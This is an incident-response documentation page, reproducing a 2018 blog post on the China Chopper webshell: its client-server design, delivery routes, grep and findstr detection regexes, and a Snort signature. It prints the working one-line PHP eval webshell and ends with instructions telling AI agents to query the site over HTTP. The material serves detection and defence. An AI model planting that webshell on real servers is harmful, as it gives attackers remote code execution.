# China Chopper webshell

Copied from Andrea Fortuna's website; <https://www.andreafortuna.org/2018/03/28/what-is-the-china-chopper-webshell-and-how-to-find-it-on-a-compromized-system/>

## What is the China Chopper Webshell, and how to find it on a compromised system?

March 28, 2018

Some days ago, during a chat with a friend who works in a small software development company, the webshells topic has come up.

During the migration of a production system, my friend found some suspicious **.php** files, which turned out to be **China Chopper webshells**.

**A simple software upgrade turned into a cybersecurity nightmare.**

### What is China Chopper?

**China Chopper** is a **4KB** Web shell first discovered in **2012**.

It is widely used by Chinese and other malicious actors, including **APT** groups, to remotely access compromised Web servers.

The webshell consists mainly of two parts, the client interface (**caidao.exe**) and a small file placed on the compromised web server.

#### Why this webshell is so dangerous and hard to find?

The file dropped on the compromised server is really small.\
&#x20;For example, the **PHP** version (the file found by my friend) is composed by a single line of code:

```
<?php @eval($_POST['password']);?>
```

Also with a limited acces to the compromized host, is very simple for an attacker to push this small code into a file.

So, all the logic is delegated to the client (**caidao.exe**) that communicates directly with the file dropped on webserver and provides a lot of interesting feature, like a **File explorer**, a **DataBase client,** an **interactive command shell** and a **“Security Scan”** useful to perform brute-force password guessing against authentication portals.

An analysis of **caidao.exe** is available here: <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>

The China Chopper can run on any web server that is capable of running **JSP**, **ASP**, **ASPX**, **PHP**, or **CFM**, on both **Windows** and **Linux**.

Due to the size of the malware’s payload, delivery mechanism can be very flexible, for example:

* WebDAV file upload
* **JBoss jmx-console** or **Apache Tomcat** management pages
* Cross-site scripting (**XSS**)
* **SQL** injection
* Vulnerabilities in applications/services
* File processing vulnerabilities
* Remote file include (**RFI**) and local file include (**LFI**) vulnerabilities
* Lateral propagation from other access

**This OS and application flexibility makes this an even more dangerous Web shell.**

### How can i detect this webshell on my webserver?

The quickest and easiest method is using regular expressions.\
&#x20;On a linux machine, an egrep across your Web directory can help identify infected files (for **.PHP** version):

```
egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php
```

On a Windows machine, you can search files using regular expressions by using the native findstr command:

```
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
```

and for **.aspx** version:

```
findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
```

### How detect the malicious network traffic?

You can use a **Snort IDS** signature [published by FireEye](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf):

```
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)
```

### References

* [http://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html](https://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html)
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>
* <http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html>
* <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.iblue.team/incident-response-1/china-chopper-webshell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.